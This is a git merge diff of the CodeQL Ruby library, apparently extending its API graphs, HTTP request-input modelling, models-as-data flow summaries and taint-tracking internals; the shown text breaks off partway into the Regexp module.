Merge branch 'main' into shared-concepts-scaffolding

2026-04-30 19:26:02 +02:00 · 2022-03-22 10:36:33 +01:00
parent 414764ccee ea065b7d8a
commit 311cbb4e13
190 changed files with 13626 additions and 1805 deletions
--- a/ruby/ql/lib/codeql/ruby/ApiGraphs.qll
+++ b/ruby/ql/lib/codeql/ruby/ApiGraphs.qll
@@ -266,6 +266,41 @@ module API {
  /** A node corresponding to the method being invoked at a method call. */
  class MethodAccessNode extends Node, Impl::MkMethodAccessNode {
    override string toString() { result = "MethodAccessNode " + tryGetPath(this) }
+
+    /** Gets the call node corresponding to this method access. */
+    DataFlow::CallNode getCallNode() { this = Impl::MkMethodAccessNode(result) }
+  }
+
+  /**
+   * An API entry point.
+   *
+   * By default, API graph nodes are only created for nodes that come from an external
+   * library or escape into an external library. The points where values cross the boundary
+   * between codebases are called "entry points".
+   *
+   * Anything in the global scope is considered to be an entry point, but
+   * additional entry points may be added by extending this class.
+   */
+  abstract class EntryPoint extends string {
+    bindingset[this]
+    EntryPoint() { any() }
+
+    /** Gets a data-flow node corresponding to a use-node for this entry point. */
+    DataFlow::LocalSourceNode getAUse() { none() }
+
+    /** Gets a data-flow node corresponding to a def-node for this entry point. */
+    DataFlow::Node getARhs() { none() }
+
+    /** Gets a call corresponding to a method access node for this entry point. */
+    DataFlow::CallNode getACall() { none() }
+
+    /** Gets an API-node for this entry point. */
+    API::Node getANode() { result = root().getASuccessor(Label::entryPoint(this)) }
+  }
+
+  // Ensure all entry points are imported from ApiGraphs.qll
+  private module ImportEntryPoints {
+    private import codeql.ruby.frameworks.data.ModelsAsData
  }

  /** Gets the root node. */
@@ -324,7 +359,7 @@ module API {

    /**
     * Holds if `ref` is a use of a node that should have an incoming edge from the root
-     * node labeled `lbl` in the API graph.
+     * node labeled `lbl` in the API graph (not including edges contributed by `API::EntryPoint`).
     */
    pragma[nomagic]
    private predicate useRoot(Label::ApiLabel lbl, DataFlow::Node ref) {
@@ -371,6 +406,10 @@ module API {
      useCandFwd().flowsTo(nd.(DataFlow::CallNode).getReceiver())
      or
      parameterStep(_, defCand(), nd)
+      or
+      nd = any(EntryPoint entry).getAUse()
+      or
+      nd = any(EntryPoint entry).getACall()
    }

    /**
@@ -416,6 +455,8 @@ module API {
    private predicate isDef(DataFlow::Node rhs) {
      // If a call node is relevant as a use-node, treat its arguments as def-nodes
      argumentStep(_, useCandFwd(), rhs)
+      or
+      rhs = any(EntryPoint entry).getARhs()
    }

    /** Gets a data flow node that flows to the RHS of a def-node. */
@@ -590,6 +631,17 @@ module API {
          )
        )
      )
+      or
+      exists(EntryPoint entry |
+        pred = root() and
+        lbl = Label::entryPoint(entry)
+      |
+        succ = MkDef(entry.getARhs())
+        or
+        succ = MkUse(entry.getAUse())
+        or
+        succ = MkMethodAccessNode(entry.getACall())
+      )
    }

    /**
@@ -619,7 +671,8 @@ module API {
        or
        any(DataFlowDispatch::ParameterPosition c).isPositional(n)
      } or
-      MkLabelBlockParameter()
+      MkLabelBlockParameter() or
+      MkLabelEntryPoint(EntryPoint name)
  }

  /** Provides classes modeling the various edges (labels) in the API graph. */
@@ -710,6 +763,18 @@ module API {

        override string toString() { result = "getBlock()" }
      }
+
+      /** A label from the root node to a custom entry point. */
+      class LabelEntryPoint extends ApiLabel {
+        private API::EntryPoint name;
+
+        LabelEntryPoint() { this = MkLabelEntryPoint(name) }
+
+        override string toString() { result = name }
+
+        /** Gets the name of the entry point. */
+        API::EntryPoint getName() { result = name }
+      }
    }

    /** Gets the `member` edge label for member `m`. */
@@ -735,5 +800,8 @@ module API {

    /** Gets the label representing the block argument/parameter. */
    LabelBlockParameter blockParameter() { any() }
+
+    /** Gets the label for the edge from the root node to a custom entry point of the given name. */
+    LabelEntryPoint entryPoint(API::EntryPoint name) { result.getName() = name }
  }
 }
--- a/ruby/ql/lib/codeql/ruby/Concepts.qll
+++ b/ruby/ql/lib/codeql/ruby/Concepts.qll
@@ -290,6 +290,44 @@ module HTTP {
      }
    }

+    /**
+     * An access to a user-controlled HTTP request input. For example, the URL or body of a request.
+     * Instances of this class automatically become `RemoteFlowSource`s.
+     *
+     * Extend this class to refine existing API models. If you want to model new APIs,
+     * extend `RequestInputAccess::Range` instead.
+     */
+    class RequestInputAccess extends DataFlow::Node instanceof RequestInputAccess::Range {
+      /**
+       * Gets a string that describes the type of this input.
+       *
+       * This is typically the name of the method that gives rise to this input.
+       */
+      string getSourceType() { result = super.getSourceType() }
+    }
+
+    /** Provides a class for modeling new HTTP request inputs. */
+    module RequestInputAccess {
+      /**
+       * An access to a user-controlled HTTP request input.
+       *
+       * Extend this class to model new APIs. If you want to refine existing API models,
+       * extend `RequestInputAccess` instead.
+       */
+      abstract class Range extends DataFlow::Node {
+        /**
+         * Gets a string that describes the type of this input.
+         *
+         * This is typically the name of the method that gives rise to this input.
+         */
+        abstract string getSourceType();
+      }
+    }
+
+    private class RequestInputAccessAsRemoteFlowSource extends RemoteFlowSource::Range instanceof RequestInputAccess {
+      override string getSourceType() { result = this.(RequestInputAccess).getSourceType() }
+    }
+
    /**
     * A function that will handle incoming HTTP requests.
     *
@@ -343,7 +381,7 @@ module HTTP {
    }

    /** A parameter that will receive parts of the url when handling an incoming request. */
-    private class RoutedParameter extends RemoteFlowSource::Range, DataFlow::ParameterNode {
+    private class RoutedParameter extends RequestInputAccess::Range, DataFlow::ParameterNode {
      RequestHandler handler;

      RoutedParameter() { this.getParameter() = handler.getARoutedParameter() }
--- a/ruby/ql/lib/codeql/ruby/controlflow/CfgNodes.qll
+++ b/ruby/ql/lib/codeql/ruby/controlflow/CfgNodes.qll
@@ -794,6 +794,20 @@ module ExprNodes {
    final override VariableWriteAccess getExpr() { result = ExprCfgNode.super.getExpr() }
  }

+  /** A control-flow node that wraps a `ConstantReadAccess` AST expression. */
+  class ConstantReadAccessCfgNode extends ExprCfgNode {
+    override ConstantReadAccess e;
+
+    final override ConstantReadAccess getExpr() { result = ExprCfgNode.super.getExpr() }
+  }
+
+  /** A control-flow node that wraps a `ConstantWriteAccess` AST expression. */
+  class ConstantWriteAccessCfgNode extends ExprCfgNode {
+    override ConstantWriteAccess e;
+
+    final override ConstantWriteAccess getExpr() { result = ExprCfgNode.super.getExpr() }
+  }
+
  /** A control-flow node that wraps a `InstanceVariableWriteAccess` AST expression. */
  class InstanceVariableWriteAccessCfgNode extends ExprCfgNode {
    override InstanceVariableWriteAccess e;
--- a/ruby/ql/lib/codeql/ruby/dataflow/FlowSummary.qll
+++ b/ruby/ql/lib/codeql/ruby/dataflow/FlowSummary.qll
@@ -2,6 +2,8 @@

 import ruby
 import codeql.ruby.DataFlow
+private import codeql.ruby.frameworks.data.ModelsAsData
+private import codeql.ruby.ApiGraphs
 private import internal.FlowSummaryImpl as Impl
 private import internal.DataFlowDispatch
 private import internal.DataFlowPrivate
@@ -165,3 +167,33 @@ private class SummarizedCallableAdapter extends Impl::Public::SummarizedCallable
 }

 class RequiredSummaryComponentStack = Impl::Public::RequiredSummaryComponentStack;
+
+private class SummarizedCallableFromModel extends SummarizedCallable {
+  string package;
+  string type;
+  string path;
+
+  SummarizedCallableFromModel() {
+    ModelOutput::relevantSummaryModel(package, type, path, _, _, _) and
+    this = package + ";" + type + ";" + path
+  }
+
+  override Call getACall() {
+    exists(API::MethodAccessNode base |
+      ModelOutput::resolvedSummaryBase(package, type, path, base) and
+      result = base.getCallNode().asExpr().getExpr()
+    )
+  }
+
+  override predicate propagatesFlowExt(string input, string output, boolean preservesValue) {
+    exists(string kind |
+      ModelOutput::relevantSummaryModel(package, type, path, input, output, kind)
+    |
+      kind = "value" and
+      preservesValue = true
+      or
+      kind = "taint" and
+      preservesValue = false
+    )
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/dataflow/internal/DataFlowImpl.qll
+++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/DataFlowImpl.qll
@@ -1756,18 +1756,31 @@ private module LocalFlowBigStep {
   * Holds if `node` can be the first node in a maximal subsequence of local
   * flow steps in a dataflow path.
   */
-  predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
+  private predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
    Stage2::revFlow(node, state, config) and
    (
-      sourceNode(node, state, config) or
-      jumpStep(_, node, config) or
-      additionalJumpStep(_, node, config) or
-      additionalJumpStateStep(_, _, node, state, config) or
-      node instanceof ParamNodeEx or
-      node.asNode() instanceof OutNodeExt or
-      store(_, _, node, _, config) or
-      read(_, _, node, config) or
+      sourceNode(node, state, config)
+      or
+      jumpStep(_, node, config)
+      or
+      additionalJumpStep(_, node, config)
+      or
+      additionalJumpStateStep(_, _, node, state, config)
+      or
+      node instanceof ParamNodeEx
+      or
+      node.asNode() instanceof OutNodeExt
+      or
+      store(_, _, node, _, config)
+      or
+      read(_, _, node, config)
+      or
      node instanceof FlowCheckNode
+      or
+      exists(FlowState s |
+        additionalLocalStateStep(_, s, node, state, config) and
+        s != state
+      )
    )
  }

@@ -1787,6 +1800,9 @@ private module LocalFlowBigStep {
    or
    exists(NodeEx next, FlowState s | Stage2::revFlow(next, s, config) |
      additionalJumpStateStep(node, state, next, s, config)
+      or
+      additionalLocalStateStep(node, state, next, s, config) and
+      s != state
    )
    or
    Stage2::revFlow(node, state, config) and
@@ -1820,42 +1836,40 @@ private module LocalFlowBigStep {
   */
  pragma[nomagic]
  private predicate localFlowStepPlus(
-    NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
-    DataFlowType t, Configuration config, LocalCallContext cc
+    NodeEx node1, FlowState state, NodeEx node2, boolean preservesValue, DataFlowType t,
+    Configuration config, LocalCallContext cc
  ) {
    not isUnreachableInCallCached(node2.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
    (
-      localFlowEntry(node1, pragma[only_bind_into](state1), pragma[only_bind_into](config)) and
+      localFlowEntry(node1, pragma[only_bind_into](state), pragma[only_bind_into](config)) and
      (
        localFlowStepNodeCand1(node1, node2, config) and
-        state1 = state2 and
        preservesValue = true and
-        t = node1.getDataFlowType() // irrelevant dummy value
+        t = node1.getDataFlowType() and // irrelevant dummy value
+        Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
        or
-        additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
+        additionalLocalFlowStepNodeCand2(node1, state, node2, state, config) and
        preservesValue = false and
        t = node2.getDataFlowType()
      ) and
      node1 != node2 and
      cc.relevantFor(node1.getEnclosingCallable()) and
-      not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
-      Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
+      not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall())
      or
      exists(NodeEx mid |
-        localFlowStepPlus(node1, state1, mid, pragma[only_bind_into](state2), preservesValue, t,
+        localFlowStepPlus(node1, pragma[only_bind_into](state), mid, preservesValue, t,
          pragma[only_bind_into](config), cc) and
        localFlowStepNodeCand1(mid, node2, config) and
        not mid instanceof FlowCheckNode and
-        Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
+        Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
      )
      or
-      exists(NodeEx mid, FlowState st |
-        localFlowStepPlus(node1, state1, mid, st, _, _, pragma[only_bind_into](config), cc) and
-        additionalLocalFlowStepNodeCand2(mid, st, node2, state2, config) and
+      exists(NodeEx mid |
+        localFlowStepPlus(node1, state, mid, _, _, pragma[only_bind_into](config), cc) and
+        additionalLocalFlowStepNodeCand2(mid, state, node2, state, config) and
        not mid instanceof FlowCheckNode and
        preservesValue = false and
-        t = node2.getDataFlowType() and
-        Stage2::revFlow(node2, state2, pragma[only_bind_into](config))
+        t = node2.getDataFlowType()
      )
    )
  }
@@ -1869,9 +1883,19 @@ private module LocalFlowBigStep {
    NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
    AccessPathFrontNil apf, Configuration config, LocalCallContext callContext
  ) {
-    localFlowStepPlus(node1, state1, node2, state2, preservesValue, apf.getType(), config,
-      callContext) and
-    localFlowExit(node2, state2, config)
+    localFlowStepPlus(node1, state1, node2, preservesValue, apf.getType(), config, callContext) and
+    localFlowExit(node2, state1, config) and
+    state1 = state2
+    or
+    additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
+    state1 != state2 and
+    preservesValue = false and
+    apf = TFrontNil(node2.getDataFlowType()) and
+    callContext.relevantFor(node1.getEnclosingCallable()) and
+    not exists(DataFlowCall call | call = callContext.(LocalCallContextSpecificCall).getCall() |
+      isUnreachableInCallCached(node1.asNode(), call) or
+      isUnreachableInCallCached(node2.asNode(), call)
+    )
  }
 }

@@ -2745,10 +2769,10 @@ private module Stage4 {

  bindingset[node, cc, config]
  private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) {
-    localFlowEntry(node, _, config) and
    result =
      getLocalCallContext(pragma[only_bind_into](pragma[only_bind_out](cc)),
-        node.getEnclosingCallable())
+        node.getEnclosingCallable()) and
+    exists(config)
  }

  private predicate localStep(
--- a/ruby/ql/lib/codeql/ruby/dataflow/internal/DataFlowImpl2.qll
+++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/DataFlowImpl2.qll
@@ -1756,18 +1756,31 @@ private module LocalFlowBigStep {
   * Holds if `node` can be the first node in a maximal subsequence of local
   * flow steps in a dataflow path.
   */
-  predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
+  private predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
    Stage2::revFlow(node, state, config) and
    (
-      sourceNode(node, state, config) or
-      jumpStep(_, node, config) or
-      additionalJumpStep(_, node, config) or
-      additionalJumpStateStep(_, _, node, state, config) or
-      node instanceof ParamNodeEx or
-      node.asNode() instanceof OutNodeExt or
-      store(_, _, node, _, config) or
-      read(_, _, node, config) or
+      sourceNode(node, state, config)
+      or
+      jumpStep(_, node, config)
+      or
+      additionalJumpStep(_, node, config)
+      or
+      additionalJumpStateStep(_, _, node, state, config)
+      or
+      node instanceof ParamNodeEx
+      or
+      node.asNode() instanceof OutNodeExt
+      or
+      store(_, _, node, _, config)
+      or
+      read(_, _, node, config)
+      or
      node instanceof FlowCheckNode
+      or
+      exists(FlowState s |
+        additionalLocalStateStep(_, s, node, state, config) and
+        s != state
+      )
    )
  }

@@ -1787,6 +1800,9 @@ private module LocalFlowBigStep {
    or
    exists(NodeEx next, FlowState s | Stage2::revFlow(next, s, config) |
      additionalJumpStateStep(node, state, next, s, config)
+      or
+      additionalLocalStateStep(node, state, next, s, config) and
+      s != state
    )
    or
    Stage2::revFlow(node, state, config) and
@@ -1820,42 +1836,40 @@ private module LocalFlowBigStep {
   */
  pragma[nomagic]
  private predicate localFlowStepPlus(
-    NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
-    DataFlowType t, Configuration config, LocalCallContext cc
+    NodeEx node1, FlowState state, NodeEx node2, boolean preservesValue, DataFlowType t,
+    Configuration config, LocalCallContext cc
  ) {
    not isUnreachableInCallCached(node2.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
    (
-      localFlowEntry(node1, pragma[only_bind_into](state1), pragma[only_bind_into](config)) and
+      localFlowEntry(node1, pragma[only_bind_into](state), pragma[only_bind_into](config)) and
      (
        localFlowStepNodeCand1(node1, node2, config) and
-        state1 = state2 and
        preservesValue = true and
-        t = node1.getDataFlowType() // irrelevant dummy value
+        t = node1.getDataFlowType() and // irrelevant dummy value
+        Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
        or
-        additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
+        additionalLocalFlowStepNodeCand2(node1, state, node2, state, config) and
        preservesValue = false and
        t = node2.getDataFlowType()
      ) and
      node1 != node2 and
      cc.relevantFor(node1.getEnclosingCallable()) and
-      not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
-      Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
+      not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall())
      or
      exists(NodeEx mid |
-        localFlowStepPlus(node1, state1, mid, pragma[only_bind_into](state2), preservesValue, t,
+        localFlowStepPlus(node1, pragma[only_bind_into](state), mid, preservesValue, t,
          pragma[only_bind_into](config), cc) and
        localFlowStepNodeCand1(mid, node2, config) and
        not mid instanceof FlowCheckNode and
-        Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
+        Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
      )
      or
-      exists(NodeEx mid, FlowState st |
-        localFlowStepPlus(node1, state1, mid, st, _, _, pragma[only_bind_into](config), cc) and
-        additionalLocalFlowStepNodeCand2(mid, st, node2, state2, config) and
+      exists(NodeEx mid |
+        localFlowStepPlus(node1, state, mid, _, _, pragma[only_bind_into](config), cc) and
+        additionalLocalFlowStepNodeCand2(mid, state, node2, state, config) and
        not mid instanceof FlowCheckNode and
        preservesValue = false and
-        t = node2.getDataFlowType() and
-        Stage2::revFlow(node2, state2, pragma[only_bind_into](config))
+        t = node2.getDataFlowType()
      )
    )
  }
@@ -1869,9 +1883,19 @@ private module LocalFlowBigStep {
    NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
    AccessPathFrontNil apf, Configuration config, LocalCallContext callContext
  ) {
-    localFlowStepPlus(node1, state1, node2, state2, preservesValue, apf.getType(), config,
-      callContext) and
-    localFlowExit(node2, state2, config)
+    localFlowStepPlus(node1, state1, node2, preservesValue, apf.getType(), config, callContext) and
+    localFlowExit(node2, state1, config) and
+    state1 = state2
+    or
+    additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
+    state1 != state2 and
+    preservesValue = false and
+    apf = TFrontNil(node2.getDataFlowType()) and
+    callContext.relevantFor(node1.getEnclosingCallable()) and
+    not exists(DataFlowCall call | call = callContext.(LocalCallContextSpecificCall).getCall() |
+      isUnreachableInCallCached(node1.asNode(), call) or
+      isUnreachableInCallCached(node2.asNode(), call)
+    )
  }
 }

@@ -2745,10 +2769,10 @@ private module Stage4 {

  bindingset[node, cc, config]
  private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) {
-    localFlowEntry(node, _, config) and
    result =
      getLocalCallContext(pragma[only_bind_into](pragma[only_bind_out](cc)),
-        node.getEnclosingCallable())
+        node.getEnclosingCallable()) and
+    exists(config)
  }

  private predicate localStep(
--- a/ruby/ql/lib/codeql/ruby/dataflow/internal/DataFlowImplForLibraries.qll
+++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/DataFlowImplForLibraries.qll
--- a/ruby/ql/lib/codeql/ruby/dataflow/internal/tainttrackingforlibraries/TaintTrackingImpl.qll
+++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/tainttrackingforlibraries/TaintTrackingImpl.qll
@@ -0,0 +1,198 @@
+/**
+ * Provides an implementation of global (interprocedural) taint tracking.
+ * This file re-exports the local (intraprocedural) taint-tracking analysis
+ * from `TaintTrackingParameter::Public` and adds a global analysis, mainly
+ * exposed through the `Configuration` class. For some languages, this file
+ * exists in several identical copies, allowing queries to use multiple
+ * `Configuration` classes that depend on each other without introducing
+ * mutual recursion among those configurations.
+ */
+
+import TaintTrackingParameter::Public
+private import TaintTrackingParameter::Private
+
+/**
+ * A configuration of interprocedural taint tracking analysis. This defines
+ * sources, sinks, and any other configurable aspect of the analysis. Each
+ * use of the taint tracking library must define its own unique extension of
+ * this abstract class.
+ *
+ * A taint-tracking configuration is a special data flow configuration
+ * (`DataFlow::Configuration`) that allows for flow through nodes that do not
+ * necessarily preserve values but are still relevant from a taint tracking
+ * perspective. (For example, string concatenation, where one of the operands
+ * is tainted.)
+ *
+ * To create a configuration, extend this class with a subclass whose
+ * characteristic predicate is a unique singleton string. For example, write
+ *
+ * ```ql
+ * class MyAnalysisConfiguration extends TaintTracking::Configuration {
+ *   MyAnalysisConfiguration() { this = "MyAnalysisConfiguration" }
+ *   // Override `isSource` and `isSink`.
+ *   // Optionally override `isSanitizer`.
+ *   // Optionally override `isSanitizerIn`.
+ *   // Optionally override `isSanitizerOut`.
+ *   // Optionally override `isSanitizerGuard`.
+ *   // Optionally override `isAdditionalTaintStep`.
+ * }
+ * ```
+ *
+ * Then, to query whether there is flow between some `source` and `sink`,
+ * write
+ *
+ * ```ql
+ * exists(MyAnalysisConfiguration cfg | cfg.hasFlow(source, sink))
+ * ```
+ *
+ * Multiple configurations can coexist, but it is unsupported to depend on
+ * another `TaintTracking::Configuration` or a `DataFlow::Configuration` in the
+ * overridden predicates that define sources, sinks, or additional steps.
+ * Instead, the dependency should go to a `TaintTracking2::Configuration` or a
+ * `DataFlow2::Configuration`, `DataFlow3::Configuration`, etc.
+ */
+abstract class Configuration extends DataFlow::Configuration {
+  bindingset[this]
+  Configuration() { any() }
+
+  /**
+   * Holds if `source` is a relevant taint source.
+   *
+   * The smaller this predicate is, the faster `hasFlow()` will converge.
+   */
+  // overridden to provide taint-tracking specific qldoc
+  override predicate isSource(DataFlow::Node source) { none() }
+
+  /**
+   * Holds if `source` is a relevant taint source with the given initial
+   * `state`.
+   *
+   * The smaller this predicate is, the faster `hasFlow()` will converge.
+   */
+  // overridden to provide taint-tracking specific qldoc
+  override predicate isSource(DataFlow::Node source, DataFlow::FlowState state) { none() }
+
+  /**
+   * Holds if `sink` is a relevant taint sink.
+   *
+   * The smaller this predicate is, the faster `hasFlow()` will converge.
+   */
+  // overridden to provide taint-tracking specific qldoc
+  override predicate isSink(DataFlow::Node sink) { none() }
+
+  /**
+   * Holds if `sink` is a relevant taint sink accepting `state`.
+   *
+   * The smaller this predicate is, the faster `hasFlow()` will converge.
+   */
+  // overridden to provide taint-tracking specific qldoc
+  override predicate isSink(DataFlow::Node sink, DataFlow::FlowState state) { none() }
+
+  /** Holds if the node `node` is a taint sanitizer. */
+  predicate isSanitizer(DataFlow::Node node) { none() }
+
+  final override predicate isBarrier(DataFlow::Node node) {
+    this.isSanitizer(node) or
+    defaultTaintSanitizer(node)
+  }
+
+  /**
+   * Holds if the node `node` is a taint sanitizer when the flow state is
+   * `state`.
+   */
+  predicate isSanitizer(DataFlow::Node node, DataFlow::FlowState state) { none() }
+
+  final override predicate isBarrier(DataFlow::Node node, DataFlow::FlowState state) {
+    this.isSanitizer(node, state)
+  }
+
+  /** Holds if taint propagation into `node` is prohibited. */
+  predicate isSanitizerIn(DataFlow::Node node) { none() }
+
+  /**
+   * Holds if taint propagation into `node` is prohibited when the flow state is
+   * `state`.
+   */
+  predicate isSanitizerIn(DataFlow::Node node, DataFlow::FlowState state) { none() }
+
+  final override predicate isBarrierIn(DataFlow::Node node, DataFlow::FlowState state) {
+    this.isSanitizerIn(node, state)
+  }
+
+  final override predicate isBarrierIn(DataFlow::Node node) { this.isSanitizerIn(node) }
+
+  /** Holds if taint propagation out of `node` is prohibited. */
+  predicate isSanitizerOut(DataFlow::Node node) { none() }
+
+  final override predicate isBarrierOut(DataFlow::Node node) { this.isSanitizerOut(node) }
+
+  /**
+   * Holds if taint propagation out of `node` is prohibited when the flow state is
+   * `state`.
+   */
+  predicate isSanitizerOut(DataFlow::Node node, DataFlow::FlowState state) { none() }
+
+  final override predicate isBarrierOut(DataFlow::Node node, DataFlow::FlowState state) {
+    this.isSanitizerOut(node, state)
+  }
+
+  /** Holds if taint propagation through nodes guarded by `guard` is prohibited. */
+  predicate isSanitizerGuard(DataFlow::BarrierGuard guard) { none() }
+
+  final override predicate isBarrierGuard(DataFlow::BarrierGuard guard) {
+    this.isSanitizerGuard(guard) or defaultTaintSanitizerGuard(guard)
+  }
+
+  /**
+   * Holds if taint propagation through nodes guarded by `guard` is prohibited
+   * when the flow state is `state`.
+   */
+  predicate isSanitizerGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) { none() }
+
+  final override predicate isBarrierGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) {
+    this.isSanitizerGuard(guard, state)
+  }
+
+  /**
+   * Holds if the additional taint propagation step from `node1` to `node2`
+   * must be taken into account in the analysis.
+   */
+  predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { none() }
+
+  final override predicate isAdditionalFlowStep(DataFlow::Node node1, DataFlow::Node node2) {
+    this.isAdditionalTaintStep(node1, node2) or
+    defaultAdditionalTaintStep(node1, node2)
+  }
+
+  /**
+   * Holds if the additional taint propagation step from `node1` to `node2`
+   * must be taken into account in the analysis. This step is only applicable
+   * in `state1` and updates the flow state to `state2`.
+   */
+  predicate isAdditionalTaintStep(
+    DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
+    DataFlow::FlowState state2
+  ) {
+    none()
+  }
+
+  final override predicate isAdditionalFlowStep(
+    DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
+    DataFlow::FlowState state2
+  ) {
+    this.isAdditionalTaintStep(node1, state1, node2, state2)
+  }
+
+  override predicate allowImplicitRead(DataFlow::Node node, DataFlow::Content c) {
+    (this.isSink(node) or this.isAdditionalTaintStep(node, _)) and
+    defaultImplicitTaintRead(node, c)
+  }
+
+  /**
+   * Holds if taint may flow from `source` to `sink` for this configuration.
+   */
+  // overridden to provide taint-tracking specific qldoc
+  override predicate hasFlow(DataFlow::Node source, DataFlow::Node sink) {
+    super.hasFlow(source, sink)
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/dataflow/internal/tainttrackingforlibraries/TaintTrackingParameter.qll
+++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/tainttrackingforlibraries/TaintTrackingParameter.qll
@@ -0,0 +1,6 @@
+import codeql.ruby.dataflow.internal.TaintTrackingPublic as Public
+
+module Private {
+  import codeql.ruby.dataflow.internal.DataFlowImplForLibraries as DataFlow
+  import codeql.ruby.dataflow.internal.TaintTrackingPrivate
+}
--- a/ruby/ql/lib/codeql/ruby/frameworks/ActionController.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/ActionController.qll
@@ -11,6 +11,7 @@ private import codeql.ruby.ast.internal.Module
 private import codeql.ruby.ApiGraphs
 private import ActionView
 private import codeql.ruby.frameworks.ActionDispatch
+private import codeql.ruby.Concepts

 /**
 * A `ClassDeclaration` for a class that extends `ActionController::Base`.
@@ -126,7 +127,7 @@ abstract class ParamsCall extends MethodCall {
 * A `RemoteFlowSource::Range` to represent accessing the
 * ActionController parameters available via the `params` method.
 */
-class ParamsSource extends RemoteFlowSource::Range {
+class ParamsSource extends HTTP::Server::RequestInputAccess::Range {
  ParamsSource() { this.asExpr().getExpr() instanceof ParamsCall }

  override string getSourceType() { result = "ActionController::Metal#params" }
@@ -143,7 +144,7 @@ abstract class CookiesCall extends MethodCall {
 * A `RemoteFlowSource::Range` to represent accessing the
 * ActionController parameters available via the `cookies` method.
 */
-class CookiesSource extends RemoteFlowSource::Range {
+class CookiesSource extends HTTP::Server::RequestInputAccess::Range {
  CookiesSource() { this.asExpr().getExpr() instanceof CookiesCall }

  override string getSourceType() { result = "ActionController::Metal#cookies" }
--- a/ruby/ql/lib/codeql/ruby/frameworks/ActiveStorage.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/ActiveStorage.qll
@@ -7,6 +7,7 @@ private import codeql.ruby.ApiGraphs
 private import codeql.ruby.Concepts
 private import codeql.ruby.DataFlow
 private import codeql.ruby.dataflow.FlowSummary
+private import codeql.ruby.frameworks.data.ModelsAsData

 /** A call to `ActiveStorage::Filename#sanitized`, considered as a path sanitizer. */
 class ActiveStorageFilenameSanitizedCall extends Path::PathSanitization::Range, DataFlow::CallNode {
@@ -17,43 +18,13 @@ class ActiveStorageFilenameSanitizedCall extends Path::PathSanitization::Range,
  }
 }

-/** The taint summary for `ActiveStorage::Filename.new`. */
-class ActiveStorageFilenameNewSummary extends SummarizedCallable {
-  ActiveStorageFilenameNewSummary() { this = "ActiveStorage::Filename.new" }
-
-  override MethodCall getACall() {
-    result =
-      API::getTopLevelMember("ActiveStorage")
-          .getMember("Filename")
-          .getAnInstantiation()
-          .asExpr()
-          .getExpr()
-  }
-
-  override predicate propagatesFlowExt(string input, string output, boolean preservesValue) {
-    input = "Argument[0]" and
-    output = "ReturnValue" and
-    preservesValue = false
-  }
-}
-
-/** The taint summary for `ActiveStorage::Filename#sanitized`. */
-class ActiveStorageFilenameSanitizedSummary extends SummarizedCallable {
-  ActiveStorageFilenameSanitizedSummary() { this = "ActiveStorage::Filename#sanitized" }
-
-  override MethodCall getACall() {
-    result =
-      API::getTopLevelMember("ActiveStorage")
-          .getMember("Filename")
-          .getInstance()
-          .getAMethodCall("sanitized")
-          .asExpr()
-          .getExpr()
-  }
-
-  override predicate propagatesFlowExt(string input, string output, boolean preservesValue) {
-    input = "Argument[-1]" and
-    output = "ReturnValue" and
-    preservesValue = false
+/** Taint related to `ActiveStorage::Filename`. */
+private class Summaries extends ModelInput::SummaryModelCsv {
+  override predicate row(string row) {
+    row =
+      [
+        "activestorage;;Member[ActiveStorage].Member[Filename].Method[new];Argument[0];ReturnValue;taint",
+        "activestorage;;Member[ActiveStorage].Member[Filename].Instance.Method[sanitized];Receiver;ReturnValue;taint",
+      ]
  }
 }
--- a/ruby/ql/lib/codeql/ruby/frameworks/core/Regexp.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/core/Regexp.qll
@@ -4,24 +4,16 @@

 private import codeql.ruby.ApiGraphs
 private import codeql.ruby.dataflow.FlowSummary
+private import codeql.ruby.frameworks.data.ModelsAsData

 /**
 * Provides modeling for the `Regexp` class.
 */
 module Regexp {
  /** A flow summary for `Regexp.escape` and its alias, `Regexp.quote`. */
